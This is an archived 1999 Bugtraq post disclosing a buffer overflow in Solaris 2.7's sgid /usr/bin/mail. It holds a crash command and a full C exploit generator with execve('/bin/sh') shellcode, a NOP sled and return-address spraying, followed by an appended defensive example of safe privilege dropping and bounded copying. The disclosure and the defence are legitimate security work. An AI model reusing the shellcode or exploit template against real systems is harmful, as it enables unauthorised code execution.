Bugtraq mailing list archives
Solaris 2.7 /usr/bin/mail
From: btellier () WEBLEY COM (Brock Tellier)
Date: Mon, 13 Sep 1999 11:22:14 -0500
Greetings,

There is a possible buffer overflow vulnerability in Solaris 2.7's sgid mail /usr/bin/mail. The reason it's only a possibility and not a full-blown exploit is that mail drops sgid privs before the overflow occurs. However, as we've seen in several past posts, this is not necessarily a bulletproof method of making one's program secure. Obviously mail needs these privs to perform some function, probably opening the appropriate mail-owned files to deliver mail. My guess would be that in the following usage, mail would need write (read?) access to foo's mail file.

bash-2.02$ mail -m `perl -e "print 'A' x 2106"` foo
.
mail: ERROR signal 11
bash-2.02$

In any case, this overflow does allow execution of any command you wish, as shown in the program at the end of this message. I would imagine that with some careful asm code, one would be able to exploit the specific vulnerability that may exist. Information on exactly what mail does with its s bit would be helpful.

Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com

--- solx86.c ---
/*
 * Generic Solaris x86 exploit program by Brock Tellier
 * Shellcode by Cheez Whiz
 * gcc -o mailex solx86.c   (32-bit x86 build; add -m32 on a 64-bit toolchain)
 * /usr/bin/mail -m `./mailex 0 1985 2285` foo
 * .    <period, enter>
 * $    <not a rootshell ;)>
 * Usage: ./mailex <offset> <NOPS> <BUFSIZE>
 *
 * Demonstrative program for mail vulnerability. mail apparently drops privs
 * before the overflow occurs so we're not going to have a sgid mail shell.
 * Perhaps someone could make some 'shellcode' to exploit an open file
 * descriptor or something (whatever the reason mail is sgid mail).
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUF 10000
#define NOP 0x90

/* Solaris x86 execve("/bin/sh") shellcode, NUL-free so strlen() sees all of it */
char shell[] =
    "\xeb\x3b\x9a\xff\xff\xff\xff\x07\xff"
    "\xc3\x5e\x31\xc0\x89\x46\xc1\x88\x46"
    "\xc6\x88\x46\x07\x89\x46\x0c\x31\xc0"
    "\x50\xb0\x17\xe8\xdf\xff\xff\xff\x83"
    "\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53"
    "\x8d\x1e\x89\x5e\x08\x53\xb0\x3b\xe8"
    "\xc8\xff\xff\xff\x83\xc4\x0c\xe8\xc8"
    "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68\xff\xff\xff\xff\xff\xff\xff\xff"
    "\xff";

unsigned long int nop;     /* length of the NOP sled */
unsigned long int esp;     /* stack pointer sampled here, used to guess mail's */
long int offset;           /* adjustment applied to esp for the return address */
char buf[BUF];             /* payload; global, so it is zero-filled */

/* Return the current stack pointer (32-bit x86 only) */
unsigned long int get_esp(void)
{
    unsigned long int sp;
    __asm__("movl %%esp,%0" : "=r"(sp));
    return sp;
}

int main(int argc, char *argv[])
{
    int buflen, i;

    if (argc > 1) offset = strtol(argv[1], NULL, 0);
    if (argc > 2) nop = strtoul(argv[2], NULL, 0); else nop = 285;
    if (argc > 3) buflen = atoi(argv[3]); else buflen = BUF - 1;

    /* keep the layout inside buf[] and leave a terminating NUL for strlen() below */
    if (buflen > BUF - 1) buflen = BUF - 1;
    if (nop + strlen(shell) > (size_t) buflen) {
        fprintf(stderr, "NOPS plus shellcode exceed BUFSIZE\n");
        return 1;
    }

    esp = get_esp();
    memset(buf, NOP, buflen);                    /* NOP sled */
    memcpy(buf + nop, shell, strlen(shell));     /* shellcode after the sled */
    /* fill the remainder with the guessed return address, 4 bytes at a time */
    for (i = nop + strlen(shell); i < buflen - 4; i += 4)
        *((int *) &buf[i]) = esp + offset;
    /* emit the payload on stdout; it is used as the -m argument to mail */
    for (i = 0; i < strlen(buf); i++)
        putchar(buf[i]);
    return 0;
}
---
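The post's own caveat is that "drops sgid privs before the overflow" only protects the program if nothing privileged (such as an open descriptor on a group-owned mailbox) survives the drop and the overflow itself is prevented. The following is an added example, not code from the post or from Solaris mail's source, showing the ordering that makes that defence hold: finish privileged work, close inherited descriptors, drop the group irrevocably and verify it, and only then copy attacker-controlled argv with a bounded copy. The function names, SUBJ_MAX and the sample inputs are assumptions; the real buffer size in /usr/bin/mail is not known from the post.

```c
/* Added example, not code from the post or from Solaris mail.  All
 * function names and SUBJ_MAX are hypothetical.  Build: gcc -o order order.c */
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define SUBJ_MAX 256  /* hypothetical subject limit, chosen for the example */

/* Bounded replacement for the unchecked copy that a 2106-byte -m argument
 * overran: refuses (errno = E2BIG) anything that does not fit together
 * with its NUL, and never writes past dst[dstlen - 1]. */
int set_subject(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (dstlen == 0 || n >= dstlen) {
        errno = E2BIG;
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Close every descriptor above keep_upto.  A handle on a group-owned file
 * opened while the process still had the sgid group survives a later
 * setgid(); closing it before argv is parsed removes the target the post
 * suggests an attacker might reuse.  Returns the number of descriptors closed. */
int close_inherited_fds(int keep_upto)
{
    long maxfd = sysconf(_SC_OPEN_MAX);
    int fd, closed = 0;

    if (maxfd < 0)
        maxfd = 1024;  /* limit unknown; assume a conservative table size */
    for (fd = keep_upto + 1; fd < maxfd; fd++)
        if (close(fd) == 0)
            closed++;
    return closed;
}

/* Drop the sgid group irrevocably.  setregid() with an explicit real gid
 * also resets the saved gid on POSIX systems, so the old effective gid
 * cannot be reacquired; setgid() alone only changes the effective gid for
 * a non-root caller and leaves the saved gid privileged.  Returns 0 when
 * the drop is verified, -1 otherwise.  On a non-sgid run (egid already
 * equal to rgid) there is nothing to regain and 0 is returned. */
int drop_sgid(void)
{
    gid_t rgid = getgid(), egid = getegid();

    if (setregid(rgid, rgid) != 0 || getegid() != rgid)
        return -1;
    if (egid != rgid && setegid(egid) == 0)
        return -1;  /* privileged gid came back: saved gid was not cleared */
    return 0;
}

int main(int argc, char *argv[])
{
    char subject[SUBJ_MAX];

    /* 1. any work that needs the sgid group is finished before this point */
    /* 2. release everything opened with the elevated group */
    close_inherited_fds(STDERR_FILENO);
    /* 3. drop the group for good and verify the drop took */
    if (drop_sgid() != 0) {
        fprintf(stderr, "could not drop group privileges\n");
        return 1;
    }
    /* 4. only now touch attacker-controlled input, with a bounded copy */
    if (set_subject(subject, sizeof subject, argc > 1 ? argv[1] : "") != 0) {
        fprintf(stderr, "subject too long (max %d bytes)\n", SUBJ_MAX - 1);
        return 1;
    }
    printf("subject ok: %s\n", subject);
    return 0;
}
```

Run it with the post's argument, `./order "$(perl -e "print 'A' x 2106")"`, and it refuses the subject instead of crashing; the regain check in drop_sgid() is what turns a silent, incomplete setgid() into a hard failure on systems where the saved gid would otherwise stay privileged.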